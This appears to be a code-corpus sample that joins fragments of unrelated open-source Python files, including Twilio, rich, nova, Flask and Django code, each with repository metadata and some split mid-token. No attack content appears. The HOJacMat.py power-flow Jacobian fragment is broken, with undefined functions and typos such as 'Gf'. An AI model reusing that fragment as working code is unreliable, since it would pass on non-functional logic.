:param Version version: Version that contains the resource
:param Response response: Response from the API
:param room_sid: The SID of the room where the track is published
:param participant_sid: The SID of the participant that subscribes to the track
:returns: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackPage
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackPage
"""
super(SubscribedTrackPage, self).__init__(version, response)
# Path Solution
self._solution = solution
def get_instance(self, payload):
"""
Build an instance of SubscribedTrackInstance
:param dict payload: Payload response from the API
:returns: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackInstance
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackInstance
"""
ret
|
urn SubscribedTrackInstance(
self._version,
payload,
room_sid=self._solution['room_sid'],
participant_sid=self._solution['participant_sid'],
)
def __repr__(self):
"""
Pro
|
vide a friendly representation
:returns: Machine friendly rep
|
leeroybrun/heigvd-timetable-parser
|
setup.py
|
Python
|
mit
| 604
| 0.036484
|
#!/usr/bin/python
# coding=utf-8
from setuptools import setup, find_packages
setup(
name = "HEIGVD_TimetableParser",
version = "0.1",
packages = find_packages(),
install_r
|
equires = ['icalendar>=3.5', 'xlrd>=0.9.2'],
# metadata for upload to PyPI
author = "Leeroy Brun",
author_email = "leeroy.brun@gmail.com",
description = "Transforme un horaire au format XLS provenant de l'intranet du département FEE de la HEIG-VD en un fichier ICS.",
license = "MIT",
keywords = "heig-vd ics xls fee",
url = "https://github.com/leeroyb
|
run/heigvd-timetable-parser",
)
|
willmcgugan/rich
|
tests/test_styled.py
|
Python
|
mit
| 471
| 0.002123
|
import io
from rich.console import Console
from rich.
|
measure import Measurement
from rich.styled import Styled
def test_styled():
styled_foo = Styled("foo", "on red")
console = Console(file=io.StringIO(), force_terminal=True, _environ={})
assert Measurement.get(console, console.options, styled_foo) == Measurement(3, 3)
console.print(styled_foo)
result = console.file.getvalue()
expected = "\x1b[41mfoo\x1b[0m\n"
assert result == expe
|
cted
|
puruckertom/ubertool
|
ubertool/terrplant/terrplant_functions.py
|
Python
|
unlicense
| 20,304
| 0.006403
|
from __future__ import division #brings in Python 3.0 mixed type calculation rules
import logging
import numpy as np
import pandas as pd
class TerrplantFunctions(object):
"""
Function class for Stir.
"""
def __init__(self):
"""Class representing the functions for Sip"""
super(TerrplantFunctions, self).__init__()
def run_dry(self):
"""
EEC for runoff for dry areas
"""
self.out_run_dry = (self.application_rate / self.incorporation_depth) * self.runoff_fraction
return self.out_run_dry
def run_semi(self):
"""
EEC for runoff to semi-aquatic areas
"""
self.out_run_semi = (self.application_rate / self.incorporation_depth) * self.runoff_fraction * 10
return self.out_run_semi
de
|
f spray(self):
"""
EEC for spray drift
"""
self.out_spray = self.application_rate * self.drift_fraction
return self.out_spray
def total_dry(self):
"""
EEC total for dry areas
"""
self.out_total_dry = self.out_run_
|
dry + self.out_spray
return self.out_total_dry
def total_semi(self):
"""
EEC total for semi-aquatic areas
"""
self.out_total_semi = self.out_run_semi + self.out_spray
return self.out_total_semi
def nms_rq_dry(self):
"""
Risk Quotient for NON-LISTED MONOCOT seedlings exposed to Pesticide X in a DRY area
"""
self.out_nms_rq_dry = self.out_total_dry / self.ec25_nonlisted_seedling_emergence_monocot
return self.out_nms_rq_dry
def loc_nms_dry(self):
"""
Level of concern for non-listed monocot seedlings exposed to pesticide X in a dry area
"""
msg_pass = "The risk quotient for non-listed monocot seedlings exposed to the pesticide via runoff to dry areas indicates a potential risk."
msg_fail = "The risk quotient for non-listed monocot seedlings exposed to the pesticide via runoff to dry areas indicates that potential risk is minimal."
boo_ratios = [ratio >= 1.0 for ratio in self.out_nms_rq_dry]
self.out_nms_loc_dry = pd.Series([msg_pass if boo else msg_fail for boo in boo_ratios])
# exceed_boolean = self.out_nms_rq_dry >= 1.0
# self.out_nms_loc_dry = exceed_boolean.map(lambda x:
# 'The risk quotient for non-listed monocot seedlings exposed to the pesticide via runoff to dry areas indicates a potential risk.' if x == True
# else 'The risk quotient for non-listed monocot seedlings exposed to the pesticide via runoff to dry areas indicates that potential risk is minimal.')
return self.out_nms_loc_dry
def nms_rq_semi(self):
"""
Risk Quotient for NON-LISTED MONOCOT seedlings exposed to Pesticide X in a SEMI-AQUATIC area
"""
self.out_nms_rq_semi = self.out_total_semi / self.ec25_nonlisted_seedling_emergence_monocot
return self.out_nms_rq_semi
def loc_nms_semi(self):
"""
Level of concern for non-listed monocot seedlings exposed to pesticide X in a semi-aquatic area
"""
msg_pass = "The risk quotient for non-listed monocot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates a potential risk."
msg_fail = "The risk quotient for non-listed monocot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates that potential risk is minimal."
boo_ratios = [ratio >= 1.0 for ratio in self.out_nms_rq_semi]
self.out_nms_loc_semi = pd.Series([msg_pass if boo else msg_fail for boo in boo_ratios])
#exceed_boolean = self.out_nms_rq_semi >= 1.0
#self.out_nms_loc_semi = exceed_boolean.map(lambda x:
# 'The risk quotient for non-listed monocot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates a potential risk.' if x == True
# else 'The risk quotient for non-listed monocot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates that potential risk is minimal.')
return self.out_nms_loc_semi
def nms_rq_spray(self):
"""
Risk Quotient for NON-LISTED MONOCOT seedlings exposed to Pesticide X via SPRAY drift
"""
self.out_nms_rq_spray = self.out_spray / self.out_min_nms_spray
return self.out_nms_rq_spray
def loc_nms_spray(self):
"""
Level of concern for non-listed monocot seedlings exposed to pesticide via spray drift
"""
msg_pass = "The risk quotient for non-listed monocot seedlings exposed to the pesticide via spray drift indicates a potential risk."
msg_fail = "The risk quotient for non-listed monocot seedlings exposed to the pesticide via spray drift indicates that potential risk is minimal."
boo_ratios = [ratio >= 1.0 for ratio in self.out_nms_rq_spray]
self.out_nms_loc_spray = pd.Series([msg_pass if boo else msg_fail for boo in boo_ratios])
#exceed_boolean = self.out_nms_rq_spray >= 1.0
#self.out_nms_loc_spray = exceed_boolean.map(lambda x:
# 'The risk quotient for non-listed monocot seedlings exposed to the pesticide via spray drift indicates a potential risk.' if x == True
# else 'The risk quotient for non-listed monocot seedlings exposed to the pesticide via spray drift indicates that potential risk is minimal.')
return self.out_nms_loc_spray
def lms_rq_dry(self):
"""
Risk Quotient for LISTED MONOCOT seedlings exposed to Pesticide X in a DRY areas
"""
self.out_lms_rq_dry = self.out_total_dry / self.noaec_listed_seedling_emergence_monocot
return self.out_lms_rq_dry
def loc_lms_dry(self):
"""
Level of concern for listed monocot seedlings exposed to pesticide via runoff in a dry area
"""
msg_pass = "The risk quotient for listed monocot seedlings exposed to the pesticide via runoff to dry areas indicates a potential risk."
msg_fail = "The risk quotient for listed monocot seedlings exposed to the pesticide via runoff to dry areas indicates that potential risk is minimal."
boo_ratios = [ratio >= 1.0 for ratio in self.out_lms_rq_dry]
self.out_lms_loc_dry = pd.Series([msg_pass if boo else msg_fail for boo in boo_ratios])
#exceed_boolean = self.out_lms_rq_dry >= 1.0
#self.out_lms_loc_dry = exceed_boolean.map(lambda x:
# 'The risk quotient for listed monocot seedlings exposed to the pesticide via runoff to dry areas indicates a potential risk.' if x == True
# else 'The risk quotient for listed monocot seedlings exposed to the pesticide via runoff to dry areas indicates that potential risk is minimal.')
return self.out_lms_loc_dry
def lms_rq_semi(self):
"""
Risk Quotient for LISTED MONOCOT seedlings exposed to Pesticide X in a SEMI-AQUATIC area
"""
self.out_lms_rq_semi = self.out_total_semi / self.noaec_listed_seedling_emergence_monocot
return self.out_lms_rq_semi
def loc_lms_semi(self):
"""
Level of concern for listed monocot seedlings exposed to pesticide X in semi-aquatic areas
"""
msg_pass = "The risk quotient for listed monocot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates a potential risk."
msg_fail = "The risk quotient for listed monocot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates that potential risk is minimal."
boo_ratios = [ratio >= 1.0 for ratio in self.out_lms_rq_semi]
self.out_lms_loc_semi = pd.Series([msg_pass if boo else msg_fail for boo in boo_ratios])
#exceed_boolean = self.out_lms_rq_semi >= 1.0
#self.out_lms_loc_semi = exceed_boolean.map(lambda x:
# 'The risk quotient for list
|
rchrd2/django-cache-decorator
|
setup.py
|
Python
|
mit
| 596
| 0.041946
|
from setuptools import setup
version = '0.4'
setup(
name
|
= 'django-cache-decorator',
packages = ['django_cache_decorator'],
license = 'MIT',
version = version,
description = 'Easily add caching to functions within a django project.',
long_description=open('README.md').read(),
author = 'Richard Caceres',
author_email = 'me@rchrd.net',
url = 'https://github.com/rchrd2/django-cache-decorator/',
download_url = 'https://github.com/rchrd2/django-cache-decorator/tarball/' + version,
keywords = ['django','caching'
|
,'decorator'],
classifiers = [],
)
|
LuizArmesto/gastos_abertos
|
gastosabertos/contratos/views.py
|
Python
|
agpl-3.0
| 13,828
| 0.005496
|
# -*- coding: utf-8 -*-
import os
import json
from sqlalchemy import and_, extract, func, desc
from datetime import datetime
from jinja2 import TemplateNotFound
from flask import Blueprint, render_template, send_from_directory, abort, request
from flask.ext.paginate import Pagination
from flask.ext import restful
from flask.ext.restful import fields
from flask.ext.restful.reqparse import RequestParser
from .models import Contrato
from gastosabertos.extensions import db
# Blueprint for Contrato
contratos = Blueprint('contratos', __name__,
template_folder='templates',
static_folder='static',
static_url_path='/contrato/static')
# Create the restful API
contratos_api = restful.Api(contratos, prefix="/api/v1")
# receita_api.decorators = [cors.crossdomain(origin='*')]
# class Date(fields.Raw):
# def format(self, value):
# return str(value)
# Parser for RevenueAPI arguments
contratos_list_parser = RequestParser()
contratos_list_parser.add_argument('cnpj')
contratos_list_parser.add_argument('orgao')
contratos_list_parser.add_argument('modalidade')
contratos_list_parser.add_argument('evento')
contratos_list_parser.add_argument('objeto')
contratos_list_parser.add_argument('processo_administrativo')
contratos_list_parser.add_argument('nome_fornecedor')
contratos_list_parser.add_argument('li
|
citacao')
contratos_list_parser.add_argument('group_by', default='')
contratos_list_parser.add_argument('order_by', 'id')
contratos_list_parser.add_argu
|
ment('page', type=int, default=0)
contratos_list_parser.add_argument('per_page_num', type=int, default=100)
# Fields for ContratoAPI data marshal
contratos_fields = { 'id': fields.Integer()
, 'orgao': fields.String()
, 'data_assinatura': fields.DateTime(dt_format='iso8601')
, 'vigencia': fields.Integer()
, 'objeto': fields.String()
, 'modalidade': fields.String()
, 'evento': fields.String()
, 'processo_administrativo': fields.String()
, 'cnpj': fields.String()
, 'nome_fornecedor': fields.String()
, 'valor': fields.Float()
, 'licitacao': fields.String()
, 'data_publicacao': fields.DateTime(dt_format='iso8601') }
class ContratoApi(restful.Resource):
def filter(self, contratos_data):
# Extract the arguments in GET request
args = contratos_list_parser.parse_args()
cnpj = args['cnpj']
nome_fornecedor = args['nome_fornecedor']
orgao = args['orgao']
modalidade = args['modalidade']
evento = args['evento']
objeto = args['objeto']
processo_administrativo = args['processo_administrativo']
licitacao = args['licitacao']
if cnpj:
contratos_data = contratos_data.filter(Contrato.cnpj == cnpj)
if nome_fornecedor:
nome_query = u'%{}%'.format(nome_fornecedor)
contratos_data = contratos_data.filter(Contrato.nome_fornecedor.ilike(nome_query))
if orgao:
orgao_query = u'%{}%'.format(orgao)
contratos_data = contratos_data.filter(Contrato.orgao.ilike(orgao_query))
if modalidade:
modalidade_query = u'%{}%'.format(modalidade)
contratos_data = contratos_data.filter(Contrato.modalidade.ilike(modalidade_query))
if evento:
evento_query = u'%{}%'.format(evento)
contratos_data = contratos_data.filter(Contrato.evento.ilike(evento_query))
if objeto:
objeto_query = u'%{}%'.format(objeto)
contratos_data = contratos_data.filter(Contrato.objeto.ilike(objeto_query))
if processo_administrativo:
processo_administrativo_query = u'%{}%'.format(processo_administrativo)
contratos_data = contratos_data.filter(Contrato.processo_administrativo.ilike(processo_administrativo_query))
if licitacao:
licitacao_query = u'%{}%'.format(licitacao)
contratos_data = contratos_data.filter(Contrato.licitacao.ilike(licitacao_query))
return contratos_data
def order(self, contratos_data):
args = contratos_list_parser.parse_args()
order_by = args['order_by'].split(',')
if order_by:
order_by_args = []
for field_name in order_by:
desc_ = False
if field_name.startswith('-'):
field_name = field_name[1:]
desc_ = True
if field_name in contratos_fields or field_name == 'count':
order_by_arg = field_name
if desc_:
order_by_arg = desc(order_by_arg)
order_by_args.append(order_by_arg)
contratos_data = contratos_data.order_by(*order_by_args)
return contratos_data
def paginate(self, contratos_data):
args = contratos_list_parser.parse_args()
page = args['page']
per_page_num = args['per_page_num']
# Limit que number of results per page
contratos_data = contratos_data.offset(page*per_page_num).limit(per_page_num)
return contratos_data
class ContratoListApi(ContratoApi):
@restful.marshal_with(contratos_fields)
def get(self):
contratos_data = db.session.query(Contrato)
contratos_data = self.order(contratos_data)
contratos_data = self.filter(contratos_data)
headers = {
# Add 'Access-Control-Expose-Headers' header here is a workaround
# until Flask-Restful adds support to it.
'Access-Control-Expose-Headers': 'X-Total-Count',
'X-Total-Count': contratos_data.count()
}
contratos_data = self.paginate(contratos_data)
return contratos_data.all(), 200, headers
contratos_api.add_resource(ContratoListApi, '/contrato/list')
class ContratoAggregateApi(ContratoApi):
def get(self):
args = contratos_list_parser.parse_args()
group_by = args['group_by'].split(',')
group_by_fields = []
# Always return a count
query_args = [func.count(Contrato.id).label('count')]
keys = []
temporary_keys = []
partial_fields = []
# Tuples with SQLAlchemy function and args to get parts of values.
# This allows to group by years or months for example.
parts = {
'year': (lambda field: [func.extract('year', field)],
lambda values: list(values)[0]),
'month': (lambda field: [func.extract('year', field), func.extract('month', field)],
lambda values: '-'.join([format(v, '02') for v in values])),
'day': (lambda field: [func.extract('year', field), func.extract('month', field), func.extract('day', field)],
lambda values: '-'.join([format(v, '02') for v in values])),
}
for field_name in group_by:
part = None
if field_name.endswith(tuple(map(lambda a: '__{}'.format(a), parts.keys()))):
# User asked to group using only part of value.
# Get the original field name and which part we should use.
# "?group_by=data_publicacao__year" results in
# field_name = 'data_publicacao'
# part = 'year'
field_name, part = field_name.split('__', 1)
if field_name in contratos_fields:
group_by_field = [getattr(Contrato, field_name)]
if part:
# Apply the "part" function
group_by_field = parts[part][0](group_by_field[0])
temporary_keys.extend(['{}__{}'.format(field_name, i) for i in range(len(group_by_field))])
partial_fields.append({
'field_name': field_name,
'count': len(group_by_field),
'part_name': part,
})
else:
keys.appe
|
ATNF/askapsdp
|
Code/Base/py-accessor/current/askap/accessors/__init__.py
|
Python
|
gpl-2.0
| 991
| 0
|
# Copyright (c) 2011 CSIRO
# Australia Telescope National Facility (ATNF)
# Commonwealth Scientific and Industrial Research Organisation (CSIRO)
# PO Box 76, Epping NSW 1710, Australia
# atnf-enquiries@csiro.au
#
# This file is part of the ASKAP software distribution.
#
# The ASKAP software distribution is free software: yo
|
u can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the License
# or (at your option) any later version.
#
# This progra
|
m is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
#
|
lealhugui/schema-analyser
|
app/server/api/migrations/0003_tablefield_inner_type.py
|
Python
|
mit
| 467
| 0
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-05-09 13:44
from __future__ import unicode_literals
from django.db import migrations, m
|
odels
class Migration(migrations.Migration):
dependencies = [
('api', '0002_tablefield_allow_null'),
]
operations = [
migrations.AddField(
model_name='tablefield',
name='inner_type',
field=models.CharField(defa
|
ult='', max_length=250),
),
]
|
chaosmaker/pyload
|
module/plugins/accounts/RyushareCom.py
|
Python
|
gpl-3.0
| 742
| 0.001348
|
# -*- coding: utf-8 -*-
from module.plugins.internal.XFSPAccount import XFSPAccount
class RyushareCom(XFSPAccount):
__name__ = "RyushareCom"
__version__ = "0.03"
__type__ = "account"
__description__ = """ryushare.com account plugin"""
__author_name__ = ("zoidberg", "trance4us")
__author_mail__ = ("zoidberg@mujmail.cz", "")
MAIN_PAGE = "http://ryushare.com/"
def logi
|
n(self, user, data, req):
req.lastURL = "http://ryushare.com/login.python"
html = req.load("http://ryushare.com/login.python",
post={"login": user, "password":
|
data["password"], "op": "login"})
if 'Incorrect Login or Password' in html or '>Error<' in html:
self.wrongPassword()
|
bitmingw/hexomega
|
assets/HOJacMat.py
|
Python
|
mit
| 2,566
| 0.011302
|
from numpy import matrix
# integer Size; integer nPQ, Matrix G; Matrix B; Array U
def JacMat(Size, nPQ, G, B, U):
# Method Of Every Entry Of Jacbean Matrix
f = U.real
e = U.imag
JacMat = zeros(Size, Size)
def Hij(B, G, e, f):
return -B*e+Gf
def Nij(B, G, e, f):
return G*e+Bf
def Jij(B, G, e, f):
return -B*f-G*e
def Lij(B, G, e, f):
return -B*e+Gf
def Rij():
return 0
def Sij():
return 0
def Aii(GM, BM, eA, fA, i):
aii = 0
for j in range(1, len(eA)):
aii = aii + G[i][j]*e[j]-B[i][j]*f[j]
return aii
def Bii(GM, BM, eA, fA, i):
bii = 0
for j in range(1, len(eA)):
bii = bii + G[i][j]*f[j]+B[i][j]*e[j]
return bii
if isSquareM(B)==True and isSquareM(G)==True and len(B) == len(G) == G.dim == B.dim:
# Build Jacbean Matrix
for m in range(0, Size, 2): #H
for n in range(0, Size, 2
|
):
if m==n:
JacMat[m][n] = Hii(B[m][m], G[m][m], e[m], f[m])
else:
JacMat[m][n] = Hij(B[m][n], G[m][n], e[m], f[m])
for m in range(0, Size, 2): #N
for n in range(1, Size, 2):
if m==n:
JacMat[m][n] = Nii(B[m][m], G[m][m], e[m], f[m])
|
else:
JacMat[m][n] = Nij(B[m][n], G[m][n], e[m], f[m])
for m in range(1, Size, 2): #J
for n in range(0, nPQ*2, 2):
if m==n:
JacMat[m][n] = Jii(B[m][m], G[m][m], e[m], f[m])
else:
JacMat[m][n] = Jij(B[m][n], G[m][n], e[m], f[m])
for m in range(1, Size, 2): #L
for n in range(1, nPQ*2, 2):
if m==n:
JacMat[m][n] = Lii(B[m][m], G[m][m], e[m], f[m])
else:
JacMat[m][n] = Lij(B[m][n], G[m][n], e[m], f[m])
for m in range(1, Size, 2): #R
for n in range(1, nPQ*2, 2):
if m==n:
JacMat[m][n] = Rii(f[m])
else:
JacMat[m][n] = Rij()
for m in range(1, Size, 2): #S
for n in range(nPQ*2+1, Size, 2):
if m==n:
JacMat[m][n] = Sii(e[m])
else:
JacMat[m][n] = Sij()
print JacMat
return JacMat
else:
print "Parameter Unmatched"
return False
|
rafaelnsantos/batfinancas
|
batfinancas/wsgi.py
|
Python
|
mit
| 399
| 0
|
"""
WSGI config for batfinancas project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/howto/deployment/wsgi/
"""
import os
from django.c
|
ore.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "batfinancas.settings")
application = get_w
|
sgi_application()
|
zrax/moul-scripts
|
Python/xPodBahroSymbol.py
|
Python
|
gpl-3.0
| 6,228
| 0.006744
|
# -*- coding: utf-8 -*-
""" *==LICENSE==*
CyanWorlds.com Engine - MMOG client, server and tools
Copyright (C) 2011 Cyan Worlds, Inc.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
Additional permissions under GNU GPL version 3 section 7
If you modify this Program, or any covered work, by linking or
combining it with any of RAD Game Tools Bink SDK, Autodesk 3ds Max SDK,
NVIDIA PhysX SDK, Microsoft DirectX SDK, OpenSSL library, Independent
JPEG Group JPEG library, Microsoft Windows Media SDK, or Apple QuickTime SDK
(or a modified version of those libraries),
containing parts covered by the terms of the Bink SDK EULA, 3ds Max EULA,
PhysX SDK EULA, DirectX SDK EULA, OpenSSL and SSLeay licenses, IJG
JPEG Library README, Windows Media SDK EULA, or QuickTime SDK EULA, the
licensors of this Program grant you additional
permission to convey the resulting work. Corresponding Source for a
non-source form of such a combination shall include the source code for
the parts of OpenSSL and IJG JPEG Library used as well as that of the covered
work.
You can contact Cyan Worlds, Inc. by email legal@cyan.com
or by snail mail at:
Cyan Worlds, Inc.
14617 N Newport Hwy
Mead, WA 99021
*==LICENSE==* """
"""
Module: xPodBahroSymbol
Age: Global
Date: January 2007
Author: Derek Odell
"""
from Plasma import *
from PlasmaTypes import *
import random
# define the attributes that will be entered in max
respBahroSymbol = ptAttribResponder(1, "resp: Bahro Symbol", ["beginning","middle","end"], netForce=1)
SymbolAppears = ptAttribInt(2, "Frame the Symbol Appears", 226, (0,5000))
DayFrameSize = ptAttribInt(3, "Frames in One Day", 2000, (0,5000))
animMasterDayLight = ptAttribAnimation(4, "Master Animation Object")
respSFX = ptAttribResponder(5, "resp: Symbol SFX", ["stop","play"],netForce = 1)
# define globals
kDayLengthInSeconds = 56585.0
# The max file "full day" animation in Payiferen is 2000 frames
# or 66.666 (2000 / 30) seconds long. We need it to last 56585
# seconds which means the animation needs to be played back at
# 0.035345 (2000 / 56585) frames per second. Which means animation
# speed needs to be set to 0.0011781666 ((2000 / 56585) / 30)
kDayAnimationSpeed = (DayFrameSize.value / kDayLengthInSeconds) / 30.0
# The Bahro symbol is set to trigger on frame 226 of 2000 which
# is 11.3% (226 / 2000) into the day. 11
|
.3% into a 56585 second
# day is 6394.105 seconds (56585 * 0.113). That gives us our base
# point for every other age that
|
needs the Bahro symbol.
kTimeWhenSymbolAppears = kDayLengthInSeconds * (float(SymbolAppears.value) / float(DayFrameSize.value))
#====================================
class xPodBahroSymbol(ptResponder):
###########################
def __init__(self):
ptResponder.__init__(self)
self.id = 5240
version = 1
self.version = version
print "__init__xPodBahroSymbol v.", version,".0"
random.seed()
###########################
def OnServerInitComplete(self):
self.ISetTimers()
respSFX.run(self.key, state="stop")
if type(animMasterDayLight.value) != type(None):
timeIntoMasterAnim = PtGetAgeTimeOfDayPercent() * (DayFrameSize.value / 30.0)
print "xPodBahroSymbol.OnServerInitComplete: Master anim is skipping to %f seconds and playing at %f speed" % (timeIntoMasterAnim, kDayAnimationSpeed)
animMasterDayLight.animation.skipToTime(timeIntoMasterAnim)
animMasterDayLight.animation.speed(kDayAnimationSpeed)
animMasterDayLight.animation.resume()
###########################
def OnNotify(self,state,id,events):
print "xPodBahroSymbol.OnNotify: state=%f id=%d events=" % (state,id),events
if id == respBahroSymbol.id:
PtAtTimeCallback(self.key, 32, 3)
###########################
def OnTimer(self,TimerID):
print "xPodBahroSymbol.OnTimer: callback id=%d" % (TimerID)
if self.sceneobject.isLocallyOwned():
if TimerID == 1:
respBahroSymbol.run(self.key, state="beginning")
respSFX.run(self.key, state="play")
elif TimerID == 2:
self.ISetTimers()
elif TimerID == 3:
respBahroSymbol.run(self.key, state="end")
respSFX.run(self.key, state="stop")
###########################
def ISetTimers(self):
beginningOfToday = PtGetDniTime() - int(PtGetAgeTimeOfDayPercent() * kDayLengthInSeconds)
timeWhenSymbolAppearsToday = beginningOfToday + kTimeWhenSymbolAppears
if timeWhenSymbolAppearsToday > PtGetDniTime():
timeTillSymbolAppears = timeWhenSymbolAppearsToday - PtGetDniTime()
PtAtTimeCallback(self.key, timeTillSymbolAppears, 1)
print "xGlobalDoor.key: %d%s" % (random.randint(0,100), hex(int(timeTillSymbolAppears + 1234)))
else:
print "xPodBahroSymbol: You missed the symbol for today."
timeLeftToday = kDayLengthInSeconds - int(PtGetAgeTimeOfDayPercent() * kDayLengthInSeconds)
timeLeftToday += 1 # because we want it to go off right AFTER the day flips
PtAtTimeCallback(self.key, timeLeftToday, 2)
print "xPodBahroSymbol: Tomorrow starts in %d seconds" % (timeLeftToday)
###########################
def OnBackdoorMsg(self, target, param):
if target == "bahro":
if self.sceneobject.isLocallyOwned():
print "xPodBahroSymbol.OnBackdoorMsg: Work!"
if param == "appear":
PtAtTimeCallback(self.key, 1, 1)
|
tescalada/npyscreen-restructure
|
tests/testMonthbox.py
|
Python
|
bsd-2-clause
| 337
| 0.011869
|
#!/bin/env python
import npyscreen
class MainFm(
|
npyscreen.Form):
def create(self):
self.mb = self.add(npyscreen.MonthBox,
use_datetime = True)
class TestApp(npyscreen.NPSAppManaged):
def onStart(self):
s
|
elf.addForm("MAIN", MainFm)
if __name__ == "__main__":
A = TestApp()
A.run()
|
sridevikoushik31/nova
|
nova/virt/xenapi/vmops.py
|
Python
|
apache-2.0
| 88,390
| 0.000645
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright 2010 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Management class for VM-related functions (spawn, reboot, etc).
"""
import functools
import itertools
import time
from eventlet import greenthread
import netaddr
from oslo.config import cfg
from nova import block_device
from nova.compute import api as compute
from nova.compute import flavors
from nova.compute import power_state
from nova.compute import task_states
from nova.compute import vm_mode
from nova.compute import vm_states
from nova import context as nova_context
from nova import exception
from nova.image import glance
from nova.openstack.common import excutils
from nova.openstack.common import importutils
from nova.openstack.common import jsonutils
from nova.openstack.common import log as logging
from nova.openstack.common import timeutils
from nova import utils
from nova.virt import configdrive
from nova.virt import driver as virt_driver
from nova.virt import firewall
from nova.virt.xenapi import agent as xapi_agent
from nova.virt.xenapi import pool_states
from nova.virt.xenapi import vm_utils
from nova.virt.xenapi import volume_utils
from nova.virt.xenapi import volumeops
LOG = logging.getLogger(__name__)
xenapi_vmops_opts = [
cfg.IntOpt('xenapi_running_timeout',
default=60,
help='number of seconds to wait for instance '
'to go to running state'),
cfg.StrOpt('xenapi_vif_driver',
default='nova.virt.xenapi.vif.XenAPIBridgeDriver',
help='The XenAPI VIF driver using XenServer Network APIs.'),
cfg.StrOpt('xenapi_image_upload_handler',
default='nova.virt.xenapi.imageupload.glance.GlanceStore',
help='Object Store Driver used to handle image uploads.'),
cfg.BoolOpt('xenapi_generate_swap',
default=False,
help='Whether to generate swap '
'(False means fetching it from OVA)'),
cfg.StrOpt('image_activation_file',
default=None,
help=_('JSON file containing image activation configuration')),
cfg.StrOpt('provider',
default='Rackspace',
help=_('Set the provider name. Defaults to "Rackspace".')),
cfg.S
|
trOpt('region',
default=None,
help=_('
|
Region compute host is in')),
cfg.StrOpt('ip_whitelist_file',
default=None,
help=_('File containing a list of IP addresses to whitelist '
'on managed hosts')),
cfg.StrOpt('max_snapshot_size',
default=0,
help=_('Maximum allowed number of bytes (before compression)'
' that may be uploaded during an instance snapshot.'
' A value of zero means there is no limit.')),
]
CONF = cfg.CONF
CONF.register_opts(xenapi_vmops_opts)
CONF.import_opt('host', 'nova.netconf')
CONF.import_opt('vncserver_proxyclient_address', 'nova.vnc')
DEFAULT_FIREWALL_DRIVER = "%s.%s" % (
firewall.__name__,
firewall.IptablesFirewallDriver.__name__)
RESIZE_TOTAL_STEPS = 5
DEVICE_ROOT = '0'
DEVICE_RESCUE = '1'
DEVICE_SWAP = '2'
DEVICE_CONFIGDRIVE = '3'
# Note(johngarbutt) HVM guests only support four devices
# until the PV tools activate, when others before available
# As such, ephemeral disk only available once PV tools load
DEVICE_EPHEMERAL = '4'
# Note(johngarbutt) Currently don't support ISO boot during rescue
# and we must have the ISO visible before the PV drivers start
DEVICE_CD = '1'
class RaxImageActivationConfig(object):
"""Manage RAX image license activation config state."""
def __init__(self):
self._cache = {}
if CONF.image_activation_file:
self._file_path = CONF.find_file(CONF.image_activation_file)
self.reload()
def reload(self):
"""(Re)load config from JSON file
The file is a dict mapping each activation profile idsto
a configuration value.
E.x. file:
{
"1-2-3-4-5": "useful_config_value"
}
"""
def _reload(data):
self._config = jsonutils.loads(data)
utils.read_cached_file(self._file_path, self._cache,
reload_func=_reload)
def get(self, profile_name):
"""Get config values for the given profile name."""
if not CONF.image_activation_file:
return None
self.reload()
return self._config.get(profile_name)
def cmp_version(a, b):
"""Compare two version strings (eg 0.0.1.10 > 0.0.1.9)."""
a = a.split('.')
b = b.split('.')
# Compare each individual portion of both version strings
for va, vb in zip(a, b):
ret = int(va) - int(vb)
if ret:
return ret
# Fallback to comparing length last
return len(a) - len(b)
def make_step_decorator(context, instance, instance_update):
"""Factory to create a decorator that records instance progress as a series
of discrete steps.
Each time the decorator is invoked we bump the total-step-count, so after::
@step
def step1():
...
@step
def step2():
...
we have a total-step-count of 2.
Each time the step-function (not the step-decorator!) is invoked, we bump
the current-step-count by 1, so after::
step1()
the current-step-count would be 1 giving a progress of ``1 / 2 *
100`` or 50%.
"""
step_info = dict(total=0, current=0)
def bump_progress():
step_info['current'] += 1
progress = round(float(step_info['current']) /
step_info['total'] * 100)
LOG.debug(_("Updating progress to %(progress)d"), locals(),
instance=instance)
instance_update(context, instance['uuid'], {'progress': progress})
def step_decorator(f):
step_info['total'] += 1
@functools.wraps(f)
def inner(*args, **kwargs):
rv = f(*args, **kwargs)
bump_progress()
return rv
return inner
return step_decorator
class VMOps(object):
"""
Management class for VM-related tasks
"""
def __init__(self, session, virtapi):
self.compute_api = compute.API()
